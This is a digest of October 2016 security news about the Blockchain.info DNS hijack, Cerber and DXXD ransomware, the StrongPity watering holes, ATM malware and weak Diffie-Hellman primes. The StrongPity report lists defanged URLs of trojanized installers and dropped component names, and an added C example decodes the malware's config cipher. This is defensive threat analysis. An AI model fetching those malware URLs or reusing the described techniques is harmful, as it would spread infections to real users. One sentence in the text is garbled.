Below the official statement issued by the company about the incident:
“Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience.”
At the time of writing there is no news regarding potential breaches of the users’ bitcoin wallets.
Experts observed several malvertising campaigns deliver Cerber 4.0
13.10.2016 securityaffairs Virus
Cerber 4.0 is the latest variant of the Cerber ransomware family that is becoming even more common in the malvertising campaign in the wild.
Another variant of the notorious Cerber ransomware, the Cerber 4.0, appeared in the wild delivered by several exploit kits, including RIG, Neutrino, and Magnitude EKs.
According to the experts from Trend Micro, the Cerber 4.0 first appeared in October and became very popular in the criminal ecosystem where it is still used to power several malvertising campaigns.
The Cerber ransomware has rapidly evolved since its first appearance; it is considered one of the greatest successes of Ransomware-as-a-Service (RaaS).
The Cerber 4.0 was released in the wild a few weeks after the version 3.0, it encrypts files and appends a randomly generated file extension (while the previously used extensions were .cerber3, .cerber2, .cerber).
The newest variant has shifted from an HTML ransom note to an HTA one.
The experts noticed that recently Cerber 4.0 is mainly dropped by the RIG toolkit, which is also the most active Exploit kit in this period.
The RIG toolkit was observed for example in the PseudoDarkleech malvertising campaign that was previously seen distributing ransomware such as CrypMIC and CryptXXX.
“As we reported previously, Cerber has become one of the most prominent ransomware families of 2016. It has a wide range of capabilities and is often bought and sold as a service (ransomware-as-a-service or RaaS)—even earlier versions were peddled as RaaS in underground markets. The rapid release of Cerber updates have made it an increasingly popular payload for several exploit kits. ” reported TrendMicro.
The experts also noticed another malvertising campaign dropping the Cerber 4.0 via the Magnitude exploit kit. The campaign has been seen targeting devices in numerous Asian countries, including Taiwan, Korea, Hong Kong, Singapore, and China.
The experts noticed many other campaigns leveraging Cerber 4.0, including one that usually employs a casino-themed fake advertisement.
Another campaign started on October 3 is leveraging the Neutrino exploit kit to target users in the US, Germany, Spain, Taiwan, and Korea.
“Malvertising and exploit kits in general are being developed and improved constantly by cybercriminals, so keeping software updated with the latest security patches is critical for users and enterprises. This includes both the operating system and all applications being used. Make sure there is a security system in place that can proactively provide a comprehensive defense against attackers targeting new vulnerabilities,” Trend Micro researchers note.
Vera Bradley retail chain notifies customers of data breach
13.10.2016 securityaffairs Crime
The American retail chain Vera Bradley announced that hackers have stolen an as yet undetermined number of payment card records from its systems.
The American retail chain Vera Bradley is the latest victim of a data breach; the company announced that hackers have stolen an as yet undetermined number of payment card records.
The breach affected customers shopping at its 112 stores and 44 outlets between 25 July and 23 September 2016. Customers shopping on the official website do not appear to have been impacted.
The FBI alerted Vera Bradley to the breach on 15 September; experts from the forensics firm Mandiant, which investigated the incident, confirmed the theft of payment card track data.
“On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue.” states the official announcement published by the company.
“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected. Findings from the investigation show unauthorised access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data,” added the company.
The hackers breached the company's network and installed malware on its servers that exfiltrated payment card data.
“The program was specifically designed to find track data in the magnetic stripe of a payment card that may contain the card number, cardholder name, expiration date, and internal verification code – as the data was being routed through the affected payment systems.” states Vera Bradley.
Crooks accessed the card number, cardholder name, expiration date, internal verification code, and other information stored in the cards' magnetic stripe track data.
“Payment cards used at Vera Bradley retail store locations between July 25, 2016 and September 23, 2016 may have been affected. Not all cards used during this time frame were affected. Cards used on our website have not been affected.” reads the notice of data breach. “On September 15, 2016, Vera Bradley was provided information from law enforcement regarding a potential data security issue related to our retail store network. Upon learning this information, we immediately notified the payment card networks and initiated an investigation with the assistance of a leading computer security firm to aggressively gather facts and determine the scope of the issue. Findings from the investigation show unauthorized access to Vera Bradley’s payment processing system and the installation of a program that looked for payment card data.”
Vera Bradley confirmed that not all cards used during the period were exposed, but customers should still monitor their bank accounts and promptly report any unauthorised card charges.
The company confirmed that it has stopped the incident and said it is still working with the forensics firm to improve the security of its systems and prevent similar incidents in the future.
This incident is the latest in a series of recent US retail chain breaches affecting the likes of Wendy’s, Hard Rock Hotel and Casino Las Vegas, and Eddie Bauer.
Trust me, I have a pen
13.10.2016 Kaspersky Security
Earlier today we became aware of a malicious website delivering Petya through the Hunter exploit kit. While there is nothing special about yet another exploit kit page, this one caught our attention because it mimics the index page of our sinkhole systems.
A malicious webpage faking one of our research systems
With cybercriminals increasingly trying to exploit trust relationships in cyberspace, it’s easy to get fooled by such attempts. We believe the criminals attempted to mimic our sinkhole systems in order to avoid being shut down by other researchers.
Just last week we were investigating a case of a serious attack that potentially breached a company. When we collected proof of the attack, we had to contact the company to help them isolate compromised systems and remediate. This brought us to a problem we commonly see today: the problem of trust.
Your first reaction when someone calls you and attempts to convince you of something must be suspicion. In our investigations we normally deal with security personnel, who are highly paranoid people and do not trust anyone by nature. So far, the reaction of the company’s security staff was spot on: get the name of the caller, the company and department name, look up the company contacts using an independent, trusted, verifiable source, contact the company and confirm the facts, asking to connect to the researcher in the office immediately to do additional voice recognition. When that is done, the conversation can be resumed. Such a reaction and verification process is what we consider standard in our business. Unfortunately, we haven’t seen the same level of cautiousness among regular users.
A typical strategy for cybercriminals is to try to hide their tools, exploit kits and other malicious files on a compromised legitimate website or inject a malicious payload into a hijacked banner network account. Attackers also will rip entire websites, or just replace links to redirect visitors to attacker controlled sites, as we observed with the StrongPity watering holes. In this case, they simply counted on the confusion caused by visual appearance.
The fake webpage looks exactly the same as the original one from our research server and there is no point in finding even minor differences. Every webpage on the web can be copied and made to look identical to the source, except for the page’s original address or validated SSL certificate. PGPHtml is an alternative possibility, with each page explicitly stating its host domain or IP and then signed and verified with a public key. The server in question has been reportedly serving the Pony Trojan, hosting the Hunter Exploit Kit and distributing Petya ransomware.
We believe that this was the act of Russian-speaking cybercriminals, who send messages to our side every time their activities are affected by the work we do. We are bringing this to your attention to make you a little bit more cautious. Having said that, our first reaction was laughter, because it brought back some memories of an excellent short video on this matter shot by our colleagues from the security industry. And, because of this history of receiving messages from malware authors in their code and on sites, we think it is unlikely that this site is a watering hole targeting security researchers.
Unfortunately, this game of shadows is a well-known method not only in the criminal world but also in the world of advanced targeted attackers. We have seen in the past that some APT groups use deceiving tactics in order to try to confuse security researchers into wrong attribution. We have seen malware samples in the past where attackers from one group implanted decoys, trying to mimic the behaviour of their rivals. This is done to harden the research process or consume extra time. The attribution process, being the hardest part of any computer investigation, can easily be driven in the wrong direction. However, we have been looking at these attempts for a long time and learned to recognize such false flags. Now we would like you to be cautious and verify everything you see.
Related to this topic, our colleagues recently presented a more in-depth analysis of these techniques at VB 2016. You can read their entire paper here: Wave your false flags!
On the StrongPity Waterhole Attacks Targeting Italian and Belgian Encryption Users
13.10.2016 Kaspersky APT
The StrongPity APT is a technically capable group that has operated under the radar for several years. The group has quietly deployed zero-days in the past, effectively spearphished targets, and maintains a modular toolset. What is most interesting about this group’s more recent activity, however, is its focus on users of encryption tools, peaking this summer. In particular, the focus was on Italian and Belgian users, but the StrongPity watering holes affected systems in far more locations than just those two. Adding in their creative waterholing and poisoned installer tactics, we describe the StrongPity APT as not only determined and well-resourced, but fairly reckless and innovative as well.
Encryption Tools
Clearly this APT is interested in encrypted data and communications. The tools targeted by this group enable practices for securing the secrecy and integrity of data. For example, WinRAR packs and encrypts files with strong suites like AES-256, and TrueCrypt encrypts full hard drives in one swoop. Both WinRAR and TrueCrypt help provide strong and reliable encryption. WinRAR enables a person to encrypt a file with AES-256 in CBC mode with a strong PBKDF2 HMAC-SHA256 based key. And TrueCrypt provides an effective open-source full disk encryption solution for Windows, Apple, Linux, and Android systems. Used together with free file-sharing services, these two tools provide a sort of one-off, poor man’s end-to-end encryption for free.
Other software applications help to support encrypted sessions and communications. Well known applications supporting end-to-end encryption are used by hundreds of millions of folks, sometimes unknowingly, every day. IM clients like Microsoft’s Skype implement 256-bit AES encrypted communications, while Putty, Winscp and Windows Remote Desktop help provide private communications and sessions with fully encrypted communications as well. Most of these communications across the wire are currently unbreakable when intercepted, at least, when the applications are configured properly.
Summer 2016 Watering Hole Resources and Trickery – WinRAR and TrueCrypt
This actor set up a particularly clever site to deliver trojanized WinRAR installers in the summer of 2016, appears to have compromised another, and this activity reminds us somewhat of the early 2014 Crouching Yeti activity. Many of the Crouching Yeti intrusions were enabled by trojanizing legitimate ICS-related IT software installers like SCADA environment VPN client installers and industrial camera software driver installers. Then, they would compromise the legitimate company software distribution sites and replace the legitimate installers with the Crouching Yeti trojanized versions. The tactics effectively compromised ICS and SCADA related facilities and networks around the world. Simply put, even when visiting a legitimate company distribution site, IT staff were downloading and installing ICS-focused malware. StrongPity’s efforts did much the same.
In the case of StrongPity, the attackers were not focused on ICS or SCADA. They set up a domain name (ralrab[.]com) mimicking the legitimate WinRAR distribution site (rarlab[.]com), and then placed links on a legitimate “certified distributor” site in Europe to redirect to their poisoned installers hosted on ralrab[.]com. In Belgium, the attackers placed a “recommended” link to their ralrab[.]com site in the middle of the localized WinRAR distribution page on winrar[.]be. The big blue recommended button (here in French) linked to the malicious installer, while all the other links on the page directed to legitimate software:
Winrar[.]be site with “recommended link” leading to malicious ralrab[.]com
The winrar[.]be site evaluated what “recommended” package a visitor may need based on browser localization and processor capability, and accordingly offered up appropriate trojanized versions. Installer resources named for French and Dutch versions, along with 32-bit versus 64-bit compiled executables, were provided over the summer:
hxxp://www.ralrab[.]com/rar/winrar-x64-531.exe
hxxp://www.ralrab[.]com/rar/winrar-x64-531fr.exe
hxxp://www.ralrab[.]com/rar/winrar-x64-531nl.exe
hxxp://www.ralrab[.]com/rar/wrar531.exe
hxxp://www.ralrab[.]com/rar/wrar531fr.exe
hxxp://www.ralrab[.]com/rar/wrar531nl.exe
hxxp://ralrab[.]com/rar/winrar-x64-531.exe
hxxp://ralrab[.]com/rar/winrar-x64-531nl.exe
hxxp://ralrab[.]com/rar/wrar531fr.exe
hxxp://ralrab[.]com/rar/wrar531nl.exe
hxxp://ralrab[.]com/rar/wrar53b5.exe
Directory listing, poisoned StrongPity installers, at ralrab[.]com
The first available visitor redirects from winrar[.]be to ralrab[.]com appeared on May 28th, 2016, from the Dutch-speaking version of the winrar.be site. And around the same time, another “certified distributor”, winrar[.]it, served trojanized installers as well. The major difference here is that we didn’t record redirections to ralrab[.]com; it appears the site directly served StrongPity trojanized installers:
hxxps://www.winrar[.]it/prelievo/WinRAR-x64-531it.exe
hxxps://www.winrar[.]it/prelievo/WRar531it.exe
The site started serving these executables a couple of days earlier, on 5/24, where a large majority of Italian visitors were affected.
Download page, winrar[.]it
Quite simply, the download links on this site directed visitors to trojanized WinRAR installers hosted from the winrar.it site itself. It’s interesting to note that both of the sites are “distributors”, where the sites are owned and managed not by rarlabs, but by local owners in individual countries.
StrongPity also directed specific visitors from popular, localized software sharing sites directly to their trojanized installers. This activity continued into late September 2016. In particular, the group redirected visitors from software aggregation and sharing site tamindir[.]com to their attacker-controlled site at true-crypt[.]com. The StrongPity controlled Truecrypt site is a complete rip of the legitimate site, now hosted by Sourceforge. Here is the Tamindir truecrypt page, looks harmless enough.
TrueCrypt page, tamindir software sharing site
Unlike the newer poisoned WinRAR installers, StrongPity hosted several Much like the poisoned WinRAR installers, multiple filenames have been used to keep up with visitor interests. Visitors may have been directed to the site by other means and downloaded directly from the ripped and persuasive site.
true-crypt[.]com malicious StrongPity distribution site
At the very bottom of the page, there are a couple of links to the poisoned installers:
hxxp://www.true-crypt[.]com/download/TrueCrypt-Setup-7.1a.exe
hxxp://true-crypt[.]com/files/TrueCrypt-7.2.exe
Referrers include these localized software aggregates and sharers:
gezginler[.]net/indir/truecrypt.html
tamindir[.]com/truecrypt/indir
It’s interesting that KSN recorded the appearance of the file on two unique systems in December 2015 and a third in January 2016, all in Turkey, and then nothing until May 2016. Then, deployment of the installers continued mostly within Turkey in July and September 2016.
Summer 2016 Watering Hole Victim Geolocations – WinRAR and TrueCrypt
Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred.
Accordingly, the country with the overwhelming number of detections was Italy, followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morocco, France, and Tunisia.
winrar[.]it StrongPity component geolocation distribution
In a similar time-span, the over sixty visitors redirected from winrar.be to ralrab.com for malicious file download were overwhelmingly located in one country. The top countries directed to StrongPity malware from the winrar.be site from May 25th through the first few days of June are Belgium, Algeria, Morocco, Netherlands, Canada, Cote D’Ivoire, and Tunisia.
winrar[.]be StrongPity component geolocation distribution
StrongPity previously set up TrueCrypt themed watering holes in late 2015. But their offensive activity surged in late summer 2016. The group set up a site directly pulled from the contents of the legitimate TrueCrypt website. From mid July to early September, dozens of visitors were redirected from tamindir[.]com to true-crypt[.]com with unsurprisingly almost all of the focus on systems in Turkey, with victims in the Netherlands as well.
tamindir[.]com to true-crypt[.]com poisoned TrueCrypt installer redirects
StrongPity Malware
The StrongPity droppers were often signed with unusual digital certificates, dropping multiple components that not only provide complete control of the victim system, but effectively steal disk contents, and can download components for further collection of various communications and contacts. Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.
When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.
In the case of the winrar[.]be/ralrab[.]com watering hole malware, each one of the six droppers that we observed created a similar set of dropped components on disk. And, in these cases, the attackers did not re-use their fake digital certificates. In addition to installing the legitimate version of WinRAR, the dropper installed the following StrongPity components:
%temp%\procexp.exe
%temp%\sega\
nvvscv.exe
prst.cab
prst.dll
wndplyr.exe
wrlck.cab
wrlck.dll
Of these files, two are configurable and encrypted with the same keyless cipher, “wrlck.cab” and “prst.cab”. While one maintains several callback C2 addresses for the backdoor to fetch more instructions and upload installed software and file paths, the other maintains something a bit more unusual. “prst.cab” maintains an encrypted list of programs that maintain encrypted connections. This simple encoding takes the most significant nibble of each character, swaps the nibbles of that byte, and xors the result against the original value. Its code looks something like this:
unsigned char x = s[i];             /* original byte */
unsigned char j = (x & 0xF0) >> 4;  /* high nibble moved into the low nibble */
unsigned char y = x ^ j;            /* decoded byte; the same step also encodes */
Using that cipher in the ralrab[.]com malware, the package is configured to seek out several crypto-enabled software applications, highlighting the group’s interest in users of more encryption-supported software suites.
putty.exe (a windows SSH client)
filezilla.exe (supports ftps uploads)
winscp.exe (a windows secure copy application, providing encrypted and secure file transfer)
mstsc.exe (Windows Remote Desktop client, providing an encrypted connection to remote systems)
mRemoteNG.exe (a remote connections manager supporting SSH, RDP, and other encrypted protocols)
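As an added example written for this article (not the malware's own code and not from the Kaspersky report), the nibble cipher above implemented in C and run over a constructed target list like the one just shown; the list contents, buffer sizes and function names are assumptions made for the illustration. It also demonstrates the property an analyst relies on when decoding such a config file: because the xor only touches the low nibble, the step is its own inverse, so the same routine both obfuscates and recovers the list.

```c
#include <stdio.h>
#include <string.h>

#define MAX_NAMES 16
#define NAME_LEN  32

/* One byte of the "keyless" cipher described in the write-up: move the
 * high nibble down and xor it against the original byte. The xor only
 * changes the low nibble, so the high nibble survives and feeding the
 * output back in restores the input: encode_byte(encode_byte(x)) == x.
 * Bytes whose high nibble is zero (e.g. '\n') are left unchanged. */
unsigned char encode_byte(unsigned char x)
{
    unsigned char j = (x & 0xF0) >> 4;
    return x ^ j;
}

/* Apply the cipher to a buffer in place; used for encoding and decoding. */
void nibble_xor(unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        buf[i] = encode_byte(buf[i]);
}

/* Constructed sample (not a real config): the process list quoted in the
 * article, newline separated, as it might look before obfuscation. */
static const char SAMPLE_PLAIN[] =
    "putty.exe\nfilezilla.exe\nwinscp.exe\nmstsc.exe\nmRemoteNG.exe";

/* Produce the obfuscated form of the sample, i.e. what an analyst would
 * find on disk. Returns the number of bytes written (0 if cap is too small). */
size_t build_encoded_sample(unsigned char *out, size_t cap)
{
    size_t len = strlen(SAMPLE_PLAIN);
    if (len > cap)
        return 0;
    memcpy(out, SAMPLE_PLAIN, len);
    nibble_xor(out, len);
    return len;
}

/* Decode an obfuscated blob and split it on newlines into names[].
 * Returns the number of names recovered (capped at MAX_NAMES). */
int decode_names(const unsigned char *blob, size_t len, char names[][NAME_LEN])
{
    unsigned char buf[256];
    int n = 0;
    size_t start = 0;

    if (len > sizeof buf)
        return 0;
    memcpy(buf, blob, len);
    nibble_xor(buf, len);            /* the same step undoes the encoding */

    for (size_t i = 0; i <= len && n < MAX_NAMES; i++) {
        if (i == len || buf[i] == '\n') {
            size_t l = i - start;
            if (l > 0) {
                if (l >= NAME_LEN)
                    l = NAME_LEN - 1;
                memcpy(names[n], buf + start, l);
                names[n][l] = '\0';
                n++;
            }
            start = i + 1;
        }
    }
    return n;
}

/* Round-trip helpers on the sample: how many names come back, and the
 * idx-th recovered name (NULL when idx is out of range). */
int sample_target_count(void)
{
    char names[MAX_NAMES][NAME_LEN];
    unsigned char blob[sizeof SAMPLE_PLAIN];
    size_t len = build_encoded_sample(blob, sizeof blob);
    return decode_names(blob, len, names);
}

const char *sample_target(int idx)
{
    static char names[MAX_NAMES][NAME_LEN];
    unsigned char blob[sizeof SAMPLE_PLAIN];
    size_t len = build_encoded_sample(blob, sizeof blob);
    int n = decode_names(blob, len, names);
    return (idx >= 0 && idx < n) ? names[idx] : NULL;
}

int main(void)
{
    unsigned char blob[sizeof SAMPLE_PLAIN];
    size_t len = build_encoded_sample(blob, sizeof blob);
    printf("obfuscated sample: %zu bytes, first byte 0x%02x\n", len, blob[0]);
    for (int i = 0; i < sample_target_count(); i++)
        printf("target %d: %s\n", i + 1, sample_target(i));
    return 0;
}
```

Printable ASCII always has a non-zero high nibble, so every letter of a process name changes ('p' becomes 'w', '.' becomes ','), which is enough to defeat a naive strings search for "putty.exe" on the config file while costing the malware nothing to reverse.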
Also included in StrongPity components are keyloggers and additional data stealers.
Conclusion
Widely available, strong cryptography software tools help provide secure and private communications that are now easily obtained and usable. In the summer of 2016, multiple encryption-enabled software applications were targeted with watering holes, social engineering tactics, and spyware by the StrongPity APT. While watering holes and poisoned installers are tactics that have been effectively used by other APTs, we have never seen the same focus on cryptography-enabled software. When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers. We have seen other APTs such as Crouching Yeti and Darkhotel distribute poisoned installers and poisoned executable code, then redistribute them through similar tactics and over p2p networks. Hopefully, simpler verification systems than the current batch of PGP and SSL applications will arise to be adopted in larger numbers. Until then, strong anti-malware and dynamic whitelisting solutions will be more necessary than ever.
BlockChain.info Domain Hijacked; Site Goes Down; 8 Million Bitcoin Wallets Inaccessible
13.10.2016 thehackernews Hacking
UPDATE: The site is back and working. Blockchain team released a statement via Twitter, which has been added at the end of this article.
If you are fascinated with the idea of digital currency, then you might have heard about BlockChain.Info.
It’s Down!
Yes, Blockchain.info, the world's most popular Bitcoin wallet and Block Explorer service, has been down for the last few hours, and it is believed that a possible cyber attack has disrupted the site.
The site is down at the time of writing, and the web server reports a bad gateway error, with a message on the website that reads:
"Looks like our site is down. We're working on it and should be back up soon."
With more than 8 million Digital Wallet customers, BlockChain is users' favorite destination to see recent transactions, stats on mined blocks and bitcoin economy charts.
A few hours ago, BlockChain team tweeted about the sudden breakdown of the site, saying: "We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned."
"We're making progress resolving the issue, but it may take upwards of several hours until services are fully restored," another tweet reads.
However, a Reddit user has noted that "The whois and DNS records suddenly jumped from CloudFlare to a cheap web host."
It seems that their domain name has been hijacked, which was later confirmed by the BlockChain team on Reddit, saying:
"Hey everyone, our DNS provider was targeted. It's going to be several hours before our services are fully restored. The CloudFlare DNS is propagating now."
Until the issue is resolved, which may take the next few hours, Blockchain.info digital wallet users will not be able to access their online accounts. Blockchain users are hoping that their online wallets have not been hacked or their funds stolen.
Since its DNS has been hijacked, an attacker could host a fake web page on the same domain in an effort to steal bitcoin wallet credentials.
So, Blockchain users are strongly recommended not to log in to the site until the Blockchain team releases an official statement via its Twitter account.
Official Statement From BlockChain:
"Earlier today, we discovered our DNS registrar had been compromised. We took immediate action to resolve the issue. To be abundantly cautious, we’re waiting for the DNS to propagate universally across the web before bringing our services back. Once DNS has propagated, we expect to restore services ASAP. Our sincerest apologies for any inconvenience."
However, there is no statement from the Blockchain.info team that suggests any hacking or compromise of its users' bitcoin wallets.
Hackers stole millions. In the end, though, they made a stupid mistake
13.10.2016 Novinky/Bezpečnost Crime
All it took was sending an SMS message and the ATM handed the hackers cash. Even though it may sound like science fiction, two years ago hackers really did find a way to achieve this. At first it all looked as if they were so clever that they would never even be caught. In the end, however, they made a stupid mistake and several of them were arrested.
Over the past two years the group of hackers focused on ATMs in the United Kingdom. They attacked mainly in London and since 2014 managed to steal more than 1.5 million pounds, almost 45 million Czech crowns.
The 30-year-old Romanian hacker Emanual Leahu, together with other accomplices, is said to be responsible for the attacks. He was arrested by British police at the end of September; the police only announced it at the end of last week.
They forgot about the cameras
It should be noted that before that, handcuffs had already been placed on two other hackers who belonged to the cybercriminal gang. The piquant detail is that they were only caught because in several cases they forgot to cover their faces in front of the ATM camera. The schoolboy error proved fatal for them.
Three hackers of the five-member team are now in cells. The remaining two, according to police information, are hiding somewhere in Romania.
The way the cybercriminals attacked is also very interesting in the whole case. They discovered that inside the seemingly impregnable construction hides an ordinary computer, which at the time still ran the Windows XP operating system.
And that was the proverbial Achilles heel of the whole system: it was just as vulnerable as ordinary computers. The hackers therefore connected a mobile phone to the USB port inside the ATM, through which the intruder, the Ploutus virus, got into the operating system.
All it took was an SMS message
To get the money, it was then enough to send a specially crafted SMS message to the connected phone, which was then passed on to the system. The system then dispensed the requested amount without any objection. The whole attack thus took barely a few seconds.
According to security experts from the antivirus company Symantec, gaining access to the innards of the ATM was not at all complicated. While the lower part, which stores the banknotes, was ingeniously secured two years ago, the upper part with the computer was protected by only one small lock.
Researchers Demonstrated How NSA Broke Trillions of Encrypted Connections
12.10.2016 thehackernews BigBrothers
In the year 2014, we came to know about the NSA's ability to break Trillions of encrypted connections by exploiting common implementations of the Diffie-Hellman key exchange algorithm – thanks to classified documents leaked by ex-NSA employee Edward Snowden.
At that time, computer scientists and senior cryptographers had presented the most plausible theory: only a few prime numbers were shared by 92 percent of the top 1 million Alexa HTTPS domains, and breaking those few primes might have fit well within the NSA's $11 billion-per-year budget dedicated to "groundbreaking cryptanalytic capabilities."
And now, researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine have practically proved how the NSA broke the most widespread encryption used on the Internet.
Diffie-Hellman key exchange (DHE) algorithm is a standard means of exchanging cryptographic keys over untrusted channels, which allows protocols such as HTTPS, SSH, VPN, SMTPS and IPsec to negotiate a secret key and create a secure connection.
Since applications that rely on the Diffie-Hellman key exchange algorithm generate ephemeral keys using groups based on large prime numbers, it would take hundreds or thousands of years and a nearly unimaginable amount of money to decrypt secure communications directly.
However, it took researchers just two months and as many as 3,000 CPUs to break one of the 1,024-bit keys that are used to secure communications on the Internet today, which could have allowed them to passively decrypt hundreds of millions of HTTPS-based communications and other Transport Layer Security (TLS) channels.
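An added illustration (not part of the article) of why a discrete-logarithm break lets a purely passive observer read Diffie-Hellman traffic. The symbols $p$, $g$, $a$, $b$, $A$, $B$ and $s$ are the usual textbook ones and are assumed here, not taken from the paper.

Both parties agree on a public prime $p$ and generator $g$; each picks a secret exponent and sends only its public value:
$$A = g^{a} \bmod p, \qquad B = g^{b} \bmod p.$$
Each side then derives the same shared secret without ever transmitting $a$ or $b$:
$$s = B^{a} = (g^{b})^{a} = g^{ab} = (g^{a})^{b} = A^{b} \pmod p.$$
An eavesdropper who records $p$, $g$, $A$ and $B$ recovers $s$ as soon as it can solve a single instance of the discrete logarithm problem:
$$a = \log_{g} A \pmod p \quad\Rightarrow\quad s = B^{a} \bmod p,$$
and nothing in the recorded traffic reveals that this has happened. The expensive stage of a number-field-sieve discrete-log attack depends only on $p$, not on the individual session, so once it has been paid for one widely shared prime, every session that used that prime costs comparatively little to unmask. That is why the researchers quoted below point to the size of $p$, rather than to any secret in the exchange, as the effective protection.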
Encrypted communications could have an undetectable backdoor
You might be wondering how the researchers managed to do something which practically takes hundreds of years, with the computational hardware available today.
In a research paper [PDF] published Tuesday, the researchers explained that the Diffie-Hellman algorithm does not contain a backdoor itself, but that it has been intentionally weakened in an undetectable way by hiding how various applications generate their prime numbers.
Additionally, the size of the keys (i.e. less than or equal to 1024 bits) chosen for use in the Diffie-Hellman algorithm also matters a lot.
The researchers created a weak 1024-bit Diffie-Hellman trapdoor function, i.e. a randomly selected large prime number drawn from a predefined group, and showed that solving the discrete logarithm problem that underpins its security is about 10,000 times easier.
"Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers wrote in their paper.
So, advanced hackers or well-resourced agencies who know how the prime numbers for the trapdoor function were generated and want to decrypt 1024-bit secured communications can solve the discrete logarithm in order to decrypt hundreds of millions of Diffie-Hellman-protected communications.
"The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible," the researchers said.
Researchers also estimate that conducting similar computations for 2048-bit keys, even with backdoored prime numbers, would be 16 million times harder than for 1024-bit keys and will remain infeasible for many years to come.
Despite the U.S. National Institute of Standards and Technology (NIST) recommending a transition to key sizes of at least 2,048 bits since 2010, the 1024-bit keys are still widely used online.
According to a survey performed by the SSL Pulse project, 22% of the Internet's top 140,000 HTTPS-protected sites use 1024-bit keys as of last month, which can be broken by nation-sponsored adversaries or intelligence agencies like NSA.
Therefore, the immediate solution to this issue is to switch to 2048-bit or even 4,096-bit keys, but, according to the researchers, in the future, all standardized prime numbers should be published together with their seeds.
The concept of backdooring primes used in the Diffie-Hellman key exchange algorithm is similar to the one discovered in the Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG, which is also believed to have been introduced by the NSA.
Almost three years ago, the Snowden leaks revealed that RSA received a $10 million bribe from the NSA to implement the flawed Dual_EC_DRBG algorithm in its BSAFE security toolkit as the default in its products, keeping encryption weak.
So it is not at all surprising if the NSA is using these undetectable, weakened "trapdoors" in millions of cryptographic keys to decrypt encrypted traffic over the Internet.
Facebook, Twitter and Instagram Share Data with Location-based Social Media Surveillance Startup
12.10.2016 thehackernews Social
Facebook, Instagram, Twitter, VK, Google's Picasa and Youtube were handing over user data access to a Chicago-based Startup — the developer of a social media monitoring tool — which then sold this data to law enforcement agencies for surveillance purposes, the ACLU disclosed Tuesday.
Government records obtained by the American Civil Liberties Union (ACLU) revealed that the big technology corporations gave "special access" to Geofeedia.
Geofeedia is a controversial social media monitoring tool that pulls social media feeds via APIs and other means of access and then makes them searchable and accessible to its clients, who can search by location or keyword to quickly find recently posted and publicly available content.
The company has marketed its services to 500 law enforcement and public safety agencies as a tool to track racial protests in Ferguson, Missouri, involving the 2014 police shooting death of Mike Brown.
With the help of a public records request, the civil rights group found that Geofeedia had entered into agreements with Twitter, Facebook, and Instagram for their users' data, gaining a developer-level access to all three social networks that allowed them to review streams of user content in ways that regular users of the public cannot.
The Denver Police Department recently signed a $30,000 annual deal with Geofeedia.
Here's what the major tech giants offered Geofeedia:
Facebook allowed the company to use its "Topic Feed API" that let Geofeedia obtain a "ranked feed of public posts" centered around specific hashtags, places or events.
Instagram provided Geofeedia access to its API (Application Programming Interface) that is a feed of data from users' public Instagram posts, including their location.
Twitter provided Geofeedia with "searchable access" to its database of public tweets. However, Twitter added additional contract terms in February to try to safeguard further against surveillance, and when found Geofeedia still touting its product as a tool to monitor protests, Twitter sent Geofeedia a cease and desist letter.
Facebook, Instagram, and Twitter have all moved to restrict access to Geofeedia after learning about the tool's activities when presented with the study's findings.
The ACLU is concerned that Geofeedia can "disproportionately impact communities of color" by monitoring activists and their neighborhoods.
Nicole Ozer, technology and civil liberties policy director for the ACLU of California, said: "These special data deals were allowing the police to sneak in through a side door and use these powerful platforms to track protesters."
However, in response to the ACLU report, Geofeedia posted Tuesday an article justifying its commitment to Freedom of Speech and Civil Liberties, releasing the following statement:
"Geofeedia has in place clear policies and guidelines to prevent the inappropriate use of our software; these include protections related to free speech and ensuring that end-users do not seek to inappropriately identify individuals based on race, ethnicity, religious, sexual orientation or political beliefs, among other factors."
Facebook said in a statement that Geofeedia only had access to publicly available data, while Twitter said it was suspending access shortly.
The ACLU is encouraging social media companies to adopt clear, public, and transparent policies prohibiting developers from exploiting user data for surveillance purposes.
DXXD Ransomware, displays legal notice and encrypts files on unmapped network shares
12.10.2016 securityaffairs Virus
The DXXD ransomware specifically targets servers and is able to encrypt files on network shares even if they haven’t been mapped.
Malware continues to evolve; the latest threat to implement a singular feature is the DXXD ransomware. The peculiarity of this threat is that it also encrypts files on network shares, even if they are unmapped (a feature already implemented by the Locky ransomware), and displays a legal notice.
The DXXD ransomware appends the .dxxd extension to the encrypted files, then leaves a ransom note on the infected machine. The DXXD ransom note contains instructions for the victims, who need to contact rep_stosd@protonmail.com or rep_stosd@tuta.io.
Another interesting feature of the malware is its ability to configure a Windows Registry setting in order to display a sort of “legal notice” when people log into a computer. The VXers used this feature so that any user who tries to log in to the server sees the ransom note.
